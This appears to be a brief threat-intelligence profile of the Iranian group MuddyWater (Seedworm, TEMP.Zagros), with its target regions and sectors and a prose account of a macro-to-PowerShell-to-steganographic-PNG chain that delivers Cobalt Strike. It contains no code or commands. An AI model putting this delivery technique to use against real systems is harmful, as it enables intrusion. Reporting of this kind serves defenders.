MuddyWater

(AKA Seedworm and TEMP.Zagros)

MuddyWater (AKA Seedworm and TEMP.Zagros) is an Iranian threat group that primarily targets the Middle East, but also Europe and North America. The group's victims are mainly in the telecommunications, government (IT services) and oil sectors.

Its latest campaign deploys an extremely complex kill chain where the malware strain is initially delivered via a Word file with an embedded macro. When the macro is executed, it launches a Powershell that downloads and executes a Powershell script from GitHub. This Powershell script then downloads a PNG file from the image hosting service Imgur and, through steganography, the pixel values of the image are used to decode a Cobalt Strike script that connects to the command and control to receive additional instructions.

MuddyWater